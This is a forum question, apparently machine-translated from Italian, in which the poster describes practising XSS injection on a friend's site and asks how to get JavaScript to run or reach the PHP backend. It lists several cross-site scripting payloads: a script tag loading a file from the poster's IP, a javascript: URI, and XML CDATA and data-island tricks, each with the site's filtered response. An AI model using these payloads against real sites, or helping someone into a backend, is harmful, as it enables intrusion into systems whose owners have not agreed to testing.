Pratico l'iniezione di HTML sul sito web dei miei amici (sa che mi sto esercitando). Quindi ho trovato una vulnerabilità se digito <!---->
nella casella di ricerca nome utente o password sito web ignora. e ho praticato alcuni tag nella casella di ricerca come <script>, <styles>, <link>
e il sito ignora (o non so cosa faccia con loro).
Quindi ho inserito questo nella casella di ricerca <script src=[myip]/tmp.js></script>
e quando l'ho fatto come query ha dato risultato Error: Please enter a query to search.
e in quel file tmp.js
era un alert('hey');
semplice ma il sito Web non pop hey
.
Così ho provato alcune altre iniezioni da diversi siti Web e ho ottenuto questi come output (tutto nella casella di ricerca)
INPUT: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
OUTPUT: Results for "<input type="image" src="denied:javascript:alert('XSS');">"
2)
INPUT: "<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
OUTPUT: Results for """"
3)
INPUT: "<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
OUTPUT: Results for ""<span></span>""
Domanda: così è vulnerabile il sito Web posso iniettare in qualche modo javascript, o posso entrare backend in qualche modo? o dovrei iniettare qualcos'altro? (il sito web usa PHP come backend)